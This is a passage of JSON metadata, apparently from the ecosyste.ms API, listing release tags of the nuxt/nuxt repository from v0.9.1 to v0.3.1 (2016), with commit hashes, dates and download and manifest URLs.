0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G